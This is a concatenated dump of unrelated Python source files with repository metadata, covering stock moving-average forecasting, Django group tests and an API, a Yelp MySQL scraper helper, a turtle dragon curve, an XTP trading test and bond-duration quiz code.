train = df[:num_train]
cv = df[num_train:num_train+num_cv]
train_cv = df[:num_train+num_cv]
test = df[num_train+num_cv:]
print("train.shape = " + str(train.shape))
print("cv.shape = " + str(cv.shape))
print("train_cv.shape = " + str(train_cv.shape))
print("test.shape = " + str(test.shape))
# Plot adjusted close over time
# rcParams['figure.figsize'] = 10, 8 # width 10, height 8
# matplotlib.rcParams.update({'font.size': 14})
# ax = train.plot(x='date', y='adj_close', style='b-', grid=True)
# ax = cv.plot(x='date', y='adj_close', style='y-', grid=True, ax=ax)
# ax = test.plot(x='date', y='adj_close', style='g-', grid=True, ax=ax)
# ax.legend(['train', 'validation', 'test'])
# ax.set_xlabel("date")
# ax.set_ylabel("USD")
# plt.show()
# --- Tune the moving-average window N on the validation set ---
RMSE = []
mape = []
for N in range(1, Nmax+1): # N is no. of samples to use to predict the next value
    est_list = get_preds_mov_avg(train_cv, 'adj_close', N, 0, num_train)
    # NOTE(review): cv is a slice of df, so this assignment can trigger
    # pandas' SettingWithCopyWarning; consider cv = df[...].copy() upstream.
    cv['est' + '_N' + str(N)] = est_list
    RMSE.append(math.sqrt(mean_squared_error(est_list, cv['adj_close'])))
    mape.append(get_mape(cv['adj_close'], est_list))
print('RMSE = ' + str(RMSE))
print('MAPE = ' + str(mape))
# Set optimum N (chosen from the validation errors printed above)
N_opt = 1
# Plot adjusted close over time
# rcParams['figure.figsize'] = 10, 8 # width 10, height 8
# matplotlib.rcParams.update({'font.size': 14})
# ax = train.plot(x='date', y='adj_close', style='b-', grid=True)
# ax = cv.plot(x='date', y='adj_close', style='y-', grid=True, ax=ax)
# ax = test.plot(x='date', y='adj_close', style='g-', grid=True, ax=ax)
# ax = cv.plot(x='date', y='est_N1', style='r-', grid=True, ax=ax)
# ax = cv.plot(x='date', y='est_N2', style='m-', grid=True, ax=ax)
# ax.legend(['train', 'validation', 'test', 'predictions with N=1', 'predictions with N=2'])
# ax.set_xlabel("date")
# ax.set_ylabel("USD")
# plt.show()
# --- Final evaluation: predict the held-out test set with N_opt ---
est_list = get_preds_mov_avg(df, 'adj_close', N_opt, 0, num_train+num_cv)
# NOTE(review): like cv above, test is a slice of df -- this assignment may
# trigger SettingWithCopyWarning.
test['est' + '_N' + str(N_opt)] = est_list
print("RMSE = %0.3f" % math.sqrt(mean_squared_error(est_list, test['adj_close'])))
print("MAPE = %0.3f%%" % get_mape(test['adj_close'], est_list))
# Plot adjusted close over time
# rcParams['figure.figsize'] = 10, 8 # width 10, height 8
# ax = train.plot(x='date', y='adj_close', style='b-', grid=True)
# ax = cv.plot(x='date', y='adj_close', style='y-', grid=True, ax=ax)
# ax = test.plot(x='date', y='adj_close', style='g-', grid=True, ax=ax)
# ax = test.plot(x='date', y='est_N1', style='r-', grid=True, ax=ax)
# ax.legend(['train', 'validation', 'test', 'predictions with N_opt=1'])
# ax.set_xlabel("date")
# ax.set_ylabel("USD")
# matplotlib.rcParams.update({'font.size': 14})
# Plot adjusted close over time
# rcParams['figure.figsize'] = 10, 8 # width 10, height 8
# ax = train.plot(x='date', y='adj_close', style='bx-', grid=True)
# ax = cv.plot(x='date', y='adj_close', style='yx-', grid=True, ax=ax)
# ax = test.plot(x='date', y='adj_close', style='gx-', grid=True, ax=ax)
# ax = test.plot(x='date', y='est_N1', style='rx-', grid=True, ax=ax)
# ax.legend(['train', 'validation', 'test', 'predictions with N_opt=1'], loc='upper left')
# ax.set_xlabel("date")
# ax.set_ylabel("USD")
# ax.set_xlim([date(2019, 4, 1), date(2019, 8, 20)])
# ax.set_ylim([7500, 8500])
# ax.set_title('Zoom in to test set')
# Plot adjusted close over time, only for test set
rcParams['figure.figsize'] = 10, 8 # width 10, height 8
matplotlib.rcParams.update({'font.size': 14})
ax = test.plot(x='date', y='adj_close', style='gx-', grid=True)
ax = test.plot(x='date', y='est_N1', style='rx-', grid=True, ax=ax)
ax.legend(['test', 'predictions using last value'], loc='upper left')
ax.set_xlabel("date")
ax.set_ylabel("USD")
ax.set_xlim([date(2019, 4, 1), date(2019, 8, 20)])
ax.set_ylim([7500, 8500])
plt.show()
| [
"tmoorebb19@gmail.com"
] | tmoorebb19@gmail.com |
0b52f95719a03bb4ab96e7b7a11a1043421d193e | 73c030f579ab33622860b1efd4c059bfbbdb0b32 | /camelot/tests/test_groups.py | 2afe0334524f7dd5407d6f2e35d3d5d804b1507f | [] | no_license | uninico/project-camelot | 6b7e60fe50583223c3c1055a70a7014281fd5df3 | d01dc5adec4473c0baaefdc7c3d82720c274368a | refs/heads/master | 2020-03-21T17:16:41.710871 | 2018-06-24T07:27:37 | 2018-06-24T07:27:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,651 | py | from django.test import TestCase
from django.contrib.auth.models import User
from django.shortcuts import reverse
from .test_friendship import FriendGroupControllerTests
from ..controllers.groupcontroller import groupcontroller, is_in_group
from ..controllers.utilities import PermissionException
from .helperfunctions import complete_add_friends
from ..models import FriendGroup
class GroupControllerTests(FriendGroupControllerTests):
    """
    Controller tests for friendgroups: creation, deletion, membership
    management, listing, and the is_in_group utility. Inherits users
    (self.u, self.friend, self.friend2) and friend controllers from
    FriendGroupControllerTests.setUp.
    """
    def setUp(self):
        # Build one group controller per user on top of the inherited fixture.
        super().setUp()
        # send login data - these commented lines are for view testing
        #response = self.client.post('', self.credentials, follow=True)
        #self.factory = RequestFactory()
        self.groupcontrol = groupcontroller(self.u.id)
        self.groupcontrol2 = groupcontroller(self.friend.id)
    def test_create_group(self):
        # Creating a group persists exactly one FriendGroup owned by self.u.
        name = "Test New Group"
        newgroup = self.groupcontrol.create(name)
        myquery = FriendGroup.objects.filter(owner=self.u.profile, name=name)
        assert len(myquery) == 1
        assert newgroup == myquery[0]
    def test_create_group_redundant_name(self):
        # TODO: unimplemented -- should define behaviour for duplicate names.
        pass
    def test_delete_group(self):
        # Only the owner may delete a group, regardless of friendship or
        # membership; deletion must not cascade to member profiles.
        name = "Test Delete"
        newgroup = self.groupcontrol.create(name)
        # some rando can't delete
        self.assertRaises(PermissionException, self.groupcontrol2.delete_group, newgroup)
        newgroup.refresh_from_db()
        # friend can't delete
        complete_add_friends(self.u.id, self.friend.id)
        self.assertRaises(PermissionException, self.groupcontrol2.delete_group, newgroup)
        newgroup.refresh_from_db()
        # delete empty group
        assert self.groupcontrol.delete_group(newgroup)
        self.assertRaises(FriendGroup.DoesNotExist, newgroup.refresh_from_db)
        # reset
        newgroup = self.groupcontrol.create(name)
        # group member can't delete
        assert self.groupcontrol.add_member(newgroup.id, self.friend.profile)
        self.assertRaises(PermissionException, self.groupcontrol2.delete_group, newgroup)
        newgroup.refresh_from_db()
        # delete group with member
        assert self.groupcontrol.delete_group(newgroup)
        self.assertRaises(FriendGroup.DoesNotExist, newgroup.refresh_from_db)
        # confirm that friend still exists
        self.friend.profile.refresh_from_db()
    def test_delete_member(self):
        # Only the owner may remove members from a group.
        name = "Test Delete Member"
        newgroup = self.groupcontrol.create(name)
        complete_add_friends(self.u.id, self.friend.id)
        # owner can delete members
        assert self.groupcontrol.add_member(newgroup.id, self.friend.profile)
        assert len(newgroup.members.all()) == 1
        assert self.groupcontrol.delete_member(newgroup, self.friend.profile)
        assert len(newgroup.members.all()) == 0
        # friend cannot delete member from group
        assert self.groupcontrol.add_member(newgroup.id, self.friend.profile)
        assert len(newgroup.members.all()) == 1
        self.assertRaises(PermissionException, self.groupcontrol2.delete_member, newgroup, self.friend.profile)
        assert len(newgroup.members.all()) == 1
    def test_add_member(self):
        # Only confirmed friends can be added, and only once each.
        name = "Test Add Member"
        newgroup = self.groupcontrol.create(name)
        # can't add user to group who is not a friend
        assert not self.groupcontrol.add_member(newgroup.id, self.friend.profile)
        assert len(newgroup.members.all()) == 0
        # become friends
        self.friendcontrol.add(self.friend.profile)
        self.otherfriendcontrol.confirm(self.u.profile)
        # now can add to group
        assert self.groupcontrol.add_member(newgroup.id, self.friend.profile)
        assert len(newgroup.members.all()) == 1
        # cannot add user to group twice
        assert not self.groupcontrol.add_member(newgroup.id, self.friend.profile)
        assert len(newgroup.members.all()) == 1
        # can't add other user to group
        assert not self.groupcontrol.add_member(newgroup.id, self.friend2.profile)
        assert len(newgroup.members.all()) == 1
        # become friends
        self.friendcontrol.add(self.friend2.profile)
        self.otherfriendcontrol2.confirm(self.u.profile)
        # now it's all good
        assert self.groupcontrol.add_member(newgroup.id, self.friend2.profile)
        assert len(newgroup.members.all()) == 2
        # add coverage for if we try to add to another user's group
    def test_return_groups(self):
        """
        Every user should be able to access another user's groups
        because this is how permissions are determined
        """
        # create a group for first user
        name1 = "Test New Group 1"
        newgroup1 = self.groupcontrol.create(name1)
        # will return self.u's groups
        ret1 = self.groupcontrol.return_groups()
        assert len(ret1) == 1
        assert ret1[0] == newgroup1
        # create a group for second user
        name2 = "Test New Group 2"
        newgroup2 = self.groupcontrol2.create(name2)
        # will return self.friend's groups
        ret2 = self.groupcontrol.return_groups(self.friend.profile)
        assert len(ret2) == 1
        assert ret2[0] == newgroup2
        # create a second group for self.friend
        name3 = "Test New Group 3"
        newgroup3 = self.groupcontrol2.create(name3)
        # self.u will access
        ret3 = self.groupcontrol.return_groups(self.friend.profile)
        assert len(ret3) == 2
        assert ret3[0] == newgroup2
        assert ret3[1] == newgroup3
        # todo: test none case
    def test_is_in_group(self):
        """
        Test utility to check if a profile is in a given group
        Before adding to group return false
        After return true
        """
        name = "Test in group"
        newgroup = self.groupcontrol.create(name)
        assert not is_in_group(newgroup, self.friend.profile)
        complete_add_friends(self.u.id, self.friend.id)
        self.groupcontrol.add_member(newgroup.id, self.friend.profile)
        assert is_in_group(newgroup, self.friend.profile)
from django.test.client import RequestFactory
from ..view.group import *
class GroupViewTests(TestCase):
    """View-layer tests for the group-management pages."""
    def setUp(self):
        # this is identical for the setup to albumviewtests, need to share code
        # Create two users; self.credentials ends up holding the second
        # user's credentials, which are later used to log in.
        self.credentials = {
            'username': 'testuser',
            'email': 'user@test.com',
            'password': 'secret'}
        self.u = User.objects.create_user(**self.credentials)
        self.u.save()
        self.credentials = {
            'username': 'testuser2',
            'email': 'user2@test.com',
            'password': 'secret'}
        self.u2 = User.objects.create_user(**self.credentials)
        self.u2.save()
        # send login data
        #response = self.client.post('', self.credentials, follow=True)
        self.factory = RequestFactory()
    def test_manage_groups_view(self):
        """
        should return 200 when we request manage_groups view as logged in user
        TODO: need to figure out how to test for non logged in user
        TODO: test that a user can't get another user's pro
        """
        # Build the request by hand so the view can be called directly.
        request = self.factory.get(reverse("manage_groups"))
        request.user = self.u
        request.session = {}
        #response = manage_groups(request)
        #self.assertEqual(response.status_code, 302)
        # log in
        response = self.client.post('', self.credentials, follow=True)
        response = manage_groups(request)
        # now that we are logged in, success
        self.assertEqual(response.status_code, 200)
"docz2a@gmail.com"
] | docz2a@gmail.com |
e1637b7f741728735c034ebbe450f6c0aeb64e01 | 6fe86ea636a69fff9174df6407839f0164407bdb | /tt/eigb/__init__.py | 90b6c77717b67f7caf596ea94e9d91d333bf979c | [
"MIT"
] | permissive | oseledets/ttpy | 9104e8014a73667b1cfc4fd867593cd8a6097ba0 | a50d5e0ce2a033a4b1aa703715cb85d715b9b34a | refs/heads/master | 2023-03-06T12:44:43.804115 | 2022-12-14T23:37:57 | 2022-12-14T23:37:57 | 5,499,019 | 220 | 77 | MIT | 2022-12-14T23:37:58 | 2012-08-21T18:22:27 | Python | UTF-8 | Python | false | false | 20 | py | from .eigb import *
| [
"ivan.oseledets@gmail.com"
] | ivan.oseledets@gmail.com |
bee38004695a79e71276ff54575c4e20006a4870 | e7bbbe8796a19af3479ff374c082b03539be1e14 | /tragopan/migrations/0039_auto_20150724_1407.py | 3a5498a8c827e4a76463688dae83df76c696310c | [] | no_license | nustarnuclear/orient | 9b219a05f8a515604578af24ab17f5d8f4c55f66 | 74c930dbdd0ecfc8b344ad692ad9252139d7ecb9 | refs/heads/master | 2021-01-17T03:15:37.271452 | 2015-09-24T10:21:36 | 2015-09-24T10:21:36 | 41,651,092 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 639 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('tragopan', '0038_auto_20150724_1359'),
]
operations = [
migrations.AlterField(
model_name='reactormodel',
name='num_control_rod_mechanisms',
field=models.PositiveSmallIntegerField(null=True, blank=True),
),
migrations.AlterField(
model_name='reactormodel',
name='num_loops',
field=models.PositiveSmallIntegerField(null=True, blank=True),
),
]
| [
"brookzhcn@gmail.com"
] | brookzhcn@gmail.com |
8d8f058dc263856303984152083e5452083a6612 | 7ac480776d4dd4c1991fc0ef1dd5ab7d55b02ee0 | /Yelp_crawler/db_forshop.py | 7ade27cddcd0a686e0bf249a7a8615b346910e4b | [] | no_license | Shencaowalker/crawler | 14b3faa015f05c0f4f1fc67a589f4f3d6d053324 | f6bfa522623b12262df2fd8d20ccdfe3c613e89e | refs/heads/master | 2021-07-09T19:16:54.143897 | 2017-10-11T00:46:09 | 2017-10-11T00:46:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,391 | py | #coding:utf-8
import MySQLdb
# Module-level MySQL connection and shared cursor used by every helper below.
# NOTE(review): credentials are hard-coded; move to config/environment.
conn=MySQLdb.connect(
    host='localhost',
    port = 3306,
    user='root',
    passwd='shen',
    db ='lunwen_yelp',
    )
cur = conn.cursor()
def insertshopdb(list):
    """Insert shop records (name, star, title, address) into `shoplist`,
    silently skipping rows that fail. Uses INSERT IGNORE to drop duplicates.

    NOTE(review): the parameter shadows the builtin ``list``.
    """
    # cur = conn.cursor()
    sqli="insert ignore into shoplist values(%s,%s,%s,%s)"
    for i in list:
        try:
            cur.execute(sqli,(i.name.encode("utf-8"),i.star.encode("utf-8"),i.title.encode("utf-8"),i.address.strip().encode("utf-8")))
        except Exception as e:
            # Best-effort insert: skip any row that cannot be stored.
            continue
    # cur.close()
    conn.commit()
def selectshopdb():
    """Print every row of `shoplist` as a formatted table (Python 2 prints).

    NOTE(review): this closes the module-level shared cursor `cur`, so any
    helper called after this one will fail -- confirm intended call order.
    """
    # cur = conn.cursor()
    aa=cur.execute("select * from shoplist")
    info = cur.fetchmany(aa)
    for ii in info:
        print ii[0].ljust(50,' '),"|",ii[1].ljust(5,' '),"|",ii[2].ljust(40,' '),"|",ii[3].ljust(40,' ')
        print "*"*139
    cur.close()
    # conn.commit()
def selectshopnamecomment(name):
    """Dump all comments for shop `name` to comment/<name>.yp and stdout.

    NOTE(review): the SQL is built by string concatenation (SQL-injection
    risk) -- should use parameterised queries. Also closes the module-level
    connection at the end, so no DB helper can run afterwards.
    """
    filename=open('comment/'+name+'.yp','w')
    cur = conn.cursor()
    exc="select * from shopcomment where shopname='"+name+"'"
    bb=cur.execute(exc)
    aa=cur.fetchmany(bb)
    for ii in aa:
        # Columns 1-5: shopname, username, star, comment time, comment text.
        print ii[1].decode("utf-8"),ii[2].decode("utf-8"),ii[3].decode("utf-8"),ii[4].decode("utf-8"),ii[5].decode("utf-8")
        filename.write(ii[1])
        filename.write("\n")
        filename.write(ii[2])
        filename.write("\n")
        filename.write(ii[3])
        filename.write("\n")
        filename.write(ii[4])
        filename.write("\n")
        filename.write(ii[5])
        filename.write("\n")
        filename.write("*"*50)
        filename.write("\n")
    filename.close()
    cur.close()
    conn.commit()
    conn.close()
def insertshopuserdb(list):
    """Insert user comments into `shopcomment` (auto-increment id first).

    NOTE(review): the inner loop variable `j` is never used, so the same
    row derived from `i` is inserted len(i) times -- presumably the body
    should use `j` (or the inner loop should be removed); confirm intent.
    """
    # cur = conn.cursor()
    sqli="insert ignore into shopcomment values(NULL,%s,%s,%s,%s,%s)"
    for i in list:
        for j in i:
            try:
                cur.execute(sqli,(i.shopname.encode("utf-8"),i.username.encode("utf-8"),i.star.encode("utf-8"),i.commenttime.encode("utf-8"),i.comment.encode("utf-8")))
                print "Insert 10 data into the database"
            except Exception as e:
                # Best-effort insert: skip any record that fails.
                continue
    # cur.close()
    conn.commit()
def selectshopname(name):
    """Print the `shoplist` row matching shop `name`.

    NOTE(review): SQL built by concatenation (injection risk), and the
    connection is closed at the end -- same caveats as selectshopnamecomment.
    """
    cur = conn.cursor()
    exc="select * from shoplist where name='"+name+"'"
    cur.execute(exc)
    aa=cur.fetchone()
    print aa[0].decode("utf-8"),aa[1].decode("utf-8"),aa[2].decode("utf-8"),aa[3].decode("utf-8")
    cur.close()
    conn.commit()
    conn.close()
if __name__=="__main__":
    # List all shops, then interactively dump one shop's comments to a file.
    selectshopdb()
    name=raw_input("Please enter the shopname to see,if you wan't see,please direct press enter:")
    selectshopnamecomment(name)
    # selectshopname(name)
| [
"s1179114797@outlook.com"
] | s1179114797@outlook.com |
fda76e23dcdd8d010170b2340d061f7f933adaa4 | 4751de6966810a91e6d2d1093189d75aff8f1e0b | /Codes/3_dragon_curve.py | 9333007de9c56635f3289d93910fd9d722f19917 | [] | no_license | rodosingh/Tesellate-2020 | 4479fcbd912f56c9fe89702652bbe4bedeb26f4e | ff017870402b94d2bd2733f997e23a3efd02959f | refs/heads/main | 2023-01-02T06:24:47.999512 | 2020-10-22T16:27:40 | 2020-10-22T16:27:40 | 305,027,618 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,337 | py | from turtle import *
# function to create the string according to which turtle would run!
def create_l_system(iters, axiom, rules):
    """Expand an L-system string.

    Starting from ``axiom``, apply the production ``rules`` (a mapping of
    symbol -> replacement) ``iters`` times; symbols without a rule are kept
    unchanged. Returns the final string of turtle instructions.
    """
    current = axiom
    for _ in range(iters):
        current = "".join(rules.get(symbol, symbol) for symbol in current)
    return current
# draw along the above string
def draw_l_system(instructions, angle, distance):
    """Interpret an L-system string with the turtle.

    'F' moves forward by ``distance``; '+' turns right and '-' turns left
    by ``angle`` degrees. Every other symbol is ignored.
    """
    for symbol in instructions:
        if symbol == '+':
            right(angle)
        elif symbol == '-':
            left(angle)
        elif symbol == 'F':
            forward(distance)
# function to execute the pattern.
def main(iterations, axiom, rules, angle, length=8, size=2, y_offset=0,
         x_offset=0, offset_angle=0, width=450, height=450):
    """Expand the L-system and draw it.

    iterations/axiom/rules define the L-system expansion; angle and length
    control the turtle interpretation; size is the pen width; the offsets
    position and orient the starting point; width/height size the window.
    """
    inst = create_l_system(iterations, axiom, rules)
    setup(width, height)
    # Move to the starting position without drawing.
    up()
    backward(-x_offset)
    left(90)
    backward(-y_offset)
    left(offset_angle)
    down()
    speed(0)  # fastest drawing speed
    pensize(size)
    draw_l_system(inst, angle, length)
    hideturtle()
    exitonclick()
# 3 - Dragon curve: L-system parameters and entry call.
axiom = "FX+FX+FX"
rules = {"X":"X+YF+", "Y":"-FX-Y"}
iterations = 15 # TOP: 15
angle = 90
main(iterations, axiom, rules, angle, length=2, size=1, width=3000, height=3000, x_offset = 450, y_offset = 50)
| [
"adityasinghdrdo@gmail.com"
] | adityasinghdrdo@gmail.com |
31d7f04d0ba5c7031c9bb5c8bf1cd387decdeee6 | 48776e220c568f7441654f6af1d856555c32d60d | /PaymentCalculator/PaymentCalculatorWithFunction(aw).py | 13e6c13605c2f42b3d3904388595a22c0f784cdd | [] | no_license | FlangoV/Learning | 059c5d3b2f1164c36bb39485d36c144e4167e84b | 70649fcd85e94c6ce67d983d54a70d9d131d6397 | refs/heads/master | 2022-12-02T08:45:44.213467 | 2020-08-16T14:50:24 | 2020-08-16T14:50:24 | 285,836,069 | 0 | 0 | null | 2020-08-16T20:26:42 | 2020-08-07T13:30:07 | Python | UTF-8 | Python | false | false | 884 | py | def calculateOverTime(floatHours, floatRate):
overtimeHours = floatHours - 40
regularPay = (floatHours-overtimeHours)*floatRate
overtimeRate = floatRate * 1.5
overtimePay = overtimeHours*overtimeRate
overtimePayment = overtimePay+regularPay
return overtimePayment
def computepay(floatHours, floatRate):
if floatRate<=40:
if floatHours>40:
return calculateOverTime(floatHours, floatRate)
else:
regularPay = floatHours*floatRate
return regularPay
else:
print("I can't process this shit")
try:
floatHours = input("Enter the hours:")
floatHours = float(floatHours)
floatRate = input("Enter the rate:")
floatRate = float(floatRate)
except:
print("Wrong Inputs")
input("Try again")
print(computepay(floatHours, floatRate))
input("Close please")
| [
"69278564+FlangoV@users.noreply.github.com"
] | 69278564+FlangoV@users.noreply.github.com |
70d9d0ea58b9b7a882331c43014f51dfd3682705 | 0211666bbaa5907777363ce0a6cd5bf3a41d9a9c | /backend/core/api.py | fe7a7b487565ce89eed2b39ba1da7c436c193569 | [] | no_license | rg3915/django-ninja-tutorial | ababfcedaab56634b752730d9da42bebb83fa52f | ced3796f844c9ef320c6618c69af707bf68d3327 | refs/heads/main | 2023-05-08T18:50:33.540095 | 2021-06-04T19:12:13 | 2021-06-04T19:12:13 | 373,887,481 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 674 | py | from typing import List
from django.contrib.auth.models import User
from django.shortcuts import get_object_or_404
from ninja import Router, Schema
from backend.todo.api import TodoSchema
router = Router()
class UserSchema(Schema):
    """Serialisation schema for a Django auth User plus their todos."""
    id: int
    first_name: str
    last_name: str
    email: str
    todos: List[TodoSchema]  # nested list serialised via TodoSchema
    # NOTE(review): an inner Meta with model/fields is the ModelSchema
    # convention; a plain ninja Schema may ignore it -- confirm intent.
    class Meta:
        model = User
        fields = '__all__'
@router.get("/users", response=List[UserSchema])
def list_users(request):
    """Return every user except the built-in ``admin`` account."""
    return User.objects.exclude(username='admin')
@router.get("/users/{id}", response=UserSchema)
def get_user(request, id: int):
    """Return the user with primary key ``id``, or respond 404."""
    return get_object_or_404(User, id=id)
| [
"regis42santos@gmail.com"
] | regis42santos@gmail.com |
eeb1821011a6e7d6efa43eabb9cc43a8875ac2ff | d3efc82dfa61fb82e47c82d52c838b38b076084c | /Autocase_Result/TSZLMM/YW_TSZLMM_SZXJ_042.py | 558f1e12f12527798214d8d814fbf62c8a419e2f | [] | no_license | nantongzyg/xtp_test | 58ce9f328f62a3ea5904e6ed907a169ef2df9258 | ca9ab5cee03d7a2f457a95fb0f4762013caa5f9f | refs/heads/master | 2022-11-30T08:57:45.345460 | 2020-07-30T01:43:30 | 2020-07-30T01:43:30 | 280,388,441 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,024 | py | #!/usr/bin/python
# -*- encoding: utf-8 -*-
import sys
sys.path.append("/home/yhl2/workspace/xtp_test/xtp/api")
from xtp_test_case import *
sys.path.append("/home/yhl2/workspace/xtp_test/service")
from ServiceConfig import *
from mainService import *
from QueryStkPriceQty import *
from log import *
sys.path.append("/home/yhl2/workspace/xtp_test/mysql")
from CaseParmInsertMysql import *
sys.path.append("/home/yhl2/workspace/xtp_test/utils")
from QueryOrderErrorMsg import queryOrderErrorMsg
class YW_TSZLMM_SZXJ_042(xtp_test_case):
    """Case YW_TSZLMM_SZXJ_042: limit-price buy order on a trading day with
    an invalid price (price = 0); the order is expected to be rejected."""
    # Test case id: YW_TSZLMM_SZXJ_042
    def test_YW_TSZLMM_SZXJ_042(self):
        # Title (Chinese, kept verbatim): "trading-day limit buy - wrong price (price = 0)".
        title = '交易日限价委托买-错误的价格(价格=0)'
        # Expected outcome of this test case.
        # Possible expected states: initial / no fill / partial fill / full fill /
        # partial-cancel reported / partial cancel / cancel pending / cancelled /
        # rejected (invalid order) / cancel-rejected / internal cancel.
        # xtp_ID and cancel_xtpID default to 0 and need not be changed.
        case_goal = {
            '期望状态': '废单',
            'errorID': 11000110,
            'errorMSG': queryOrderErrorMsg(11000110),
            '是否生成报单': '是',
            '是否是撤废': '否',
            'xtp_ID': 0,
            'cancel_xtpID': 0,
        }
        logger.warning(title)
        # Order parameters ------------------------------------------
        # Args: ticker, market, security type, security status, trading status,
        # side (B = buy, S = sell), expected state, Api.
        stkparm = QueryStkPriceQty('999999', '2', '0', '10', '0', 'B', case_goal['期望状态'], Api)
        # If fetching the order parameters fails, the test case fails.
        if stkparm['返回结果'] is False:
            rs = {
                '用例测试结果': stkparm['返回结果'],
                '测试错误原因': '获取下单参数失败,' + stkparm['错误原因'],
            }
            self.assertEqual(rs['用例测试结果'], True)
        else:
            # Build the order request: Shenzhen market, limit price 0 (invalid).
            wt_reqs = {
                'business_type': Api.const.XTP_BUSINESS_TYPE['XTP_BUSINESS_TYPE_CASH'],
                'order_client_id':2,
                'market': Api.const.XTP_MARKET_TYPE['XTP_MKT_SZ_A'],
                'ticker': stkparm['证券代码'],
                'side': Api.const.XTP_SIDE_TYPE['XTP_SIDE_BUY'],
                'price_type': Api.const.XTP_PRICE_TYPE['XTP_PRICE_LIMIT'],
                'price': 0,
                'quantity': 200,
                'position_effect': Api.const.XTP_POSITION_EFFECT_TYPE['XTP_POSITION_EFFECT_INIT']
            }
            ParmIni(Api, case_goal['期望状态'], wt_reqs['price_type'])
            CaseParmInsertMysql(case_goal, wt_reqs)
            rs = serviceTest(Api, case_goal, wt_reqs)
            logger.warning('执行结果为' + str(rs['用例测试结果']) + ','
                           + str(rs['用例错误源']) + ',' + str(rs['用例错误原因']))
            self.assertEqual(rs['用例测试结果'], True)  # expect the service test to report success
if __name__ == '__main__':
    # Allow running this test case directly from the command line.
    unittest.main()
| [
"418033945@qq.com"
] | 418033945@qq.com |
aeea65c858c30eff32f4ac5f2faf6c7b099e2677 | ffc02daee3b777da700425b5e0ff8445e8c7b6d8 | /Quiz/quiz_4_asset_management.py | dbc1cb6ff3506d40f8f229f46e933cd7d6ea08dc | [] | no_license | nahlaerrakik/edhec-portfolio-construction-analysis | bc5d773f51c0f9f4c651be1dafa7210e1120a54d | 018c976f0a11968614b3b1f5f6c478fe2d3a60ad | refs/heads/main | 2023-01-22T04:12:18.485805 | 2020-12-02T23:41:55 | 2020-12-02T23:41:55 | 318,020,909 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,413 | py | __author__ = 'nahla.errakik'
import edhec_risk_kit as erk
import pandas as pd
"""In the following questions, we will be working with three bonds:
B1 is a 15 Year Bond with a Face Value of $1000 that pays a 5% coupon semi-annually (2 times a year)
B2 is a 5 Year Bond with a Face value of $1000 that pays a 6% coupon quarterly (4 times a year)
B3 is a 10 Year Zero-Coupon Bond with a Face Value of $1000 (Hint: you can still use the erk.bond_cash_flows() and erk.bond_price() by setting the coupon amount to 0% and coupons_per_year to 1) Assume the yield curve is flat at 5%. Duration refers to Macaulay Duration
Hint: the macaulay_duration function gives as output the duration expressed in periods and not in years. If you want to get the yearly duration you need to divide the duration for coupons_per_year;
e.g.: duarion_B2 = erk.macaulay_duration(flows_B2, 0.05/4)/4"""
def question_1_2_3():
    """Quiz Q1-Q3: price B1/B2/B3 at a flat 5% yield and compare.

    B1: 15y, 5% coupon semi-annual; B2: 5y, 6% coupon quarterly;
    B3: 10y zero-coupon, priced directly as face / 1.05**10.
    """
    b1 = erk.bond_price(15, 1000, 0.05, 2, 0.05)
    b2 = erk.bond_price(5, 1000, 0.06, 4, 0.05)
    b3 = 1000 / 1.05 ** 10
    # Map each price back to its label; NOTE(review): a dict keyed by price
    # would collapse entries if two bonds ever priced identically.
    bonds = {b1: 'b1', b2: 'b2', b3: 'b3'}
    max_bond = max([b1, b2, b3])
    min_bond = min([b1, b2, b3])
    print("Q1: Which of the three bonds is the most expensive? {}".format(bonds[max_bond]))
    print("Q2: Which of the three bonds is the least expensive? {}".format(bonds[min_bond]))
    print("Q3: What is the price of the 10 Year Zero Coupon Bond B3? {}".format(b3))
def question_4_5_6():
    """Quiz Q4-Q6: Macaulay durations of B1/B2/B3 at a flat 5% yield.

    erk.macaulay_duration returns the duration in coupon periods, so each
    result is divided by the number of coupons per year to get years.
    """
    d1 = erk.macaulay_duration(erk.bond_cash_flows(15, 1000, 0.05, 2), 0.05 / 2) / 2
    d2 = erk.macaulay_duration(erk.bond_cash_flows(5, 1000, 0.06, 4), 0.05 / 4) / 4
    d3 = erk.macaulay_duration(erk.bond_cash_flows(10, 1000, 0.00), 0.05)
    max_duration = max([d1, d2, d3])
    min_duration = min([d1, d2, d3])
    durations = {d1: 'd1', d2: 'd2', d3: 'd3'}
    print("Q4: Which of the three bonds has the highest (Macaulay) Duration? {}".format(durations[max_duration]))
    print("Q5: Which of the three bonds has the lowest (Macaulay) Duration? {}".format(durations[min_duration]))
    # Bug fix: Q6 asks for the duration of B2 (the 5-year bond), but the
    # original printed d3 (the zero-coupon bond's duration).
    print("Q6: What is the duration of the 5 year bond B2? {}".format(d2))
def question_7():
    """Quiz Q7: Macaulay duration of three dated liabilities at a flat 5% rate."""
    cash_amounts = [100000, 200000, 300000]
    due_in_years = [3, 5, 10]
    liabilities = pd.Series(cash_amounts, index=due_in_years)
    duration = erk.macaulay_duration(liabilities, .05)
    message = ("Q7: Assume a sequence of 3 liabilities of $100,000, $200,000 and $300,000 that are 3, 5 and 10 years away, respectively. "
               "What is the Duration of the liabilities? {}".format(duration))
    print(message)
def question_8():
    """Assuming the same set of liabilities as the previous question
    (i.e. a sequence of 3 liabilities of 100,000, 200,000 and $300,000 that are 3, 5 and 10 years away, respectively)
    build a Duration Matched Portfolio of B1 and B2 to match these liabilities. What is the weight of B2 in the portfolio?
    (Hint: the code we developed in class erk.match_durations() assumes that all the bonds have the same number of coupons per year.
    This is not the case here, so you will either need to enhance the code or compute the weight directly e.g. by entering the steps in a
    Jupyter Notebook Cell or at the Python Command Line)"""
    pass  # TODO: intentionally left unimplemented (worked by hand per the hint)
def question_9():
    """Assume you can use any of the bonds B1, B2 and B3 to build a duration matched bond portfolio matched to the liabilities.
    Which combination of 2 bonds can you NOT use to build a duration matched bond portfolio?"""
    pass  # TODO: intentionally left unimplemented (conceptual question)
def question_10():
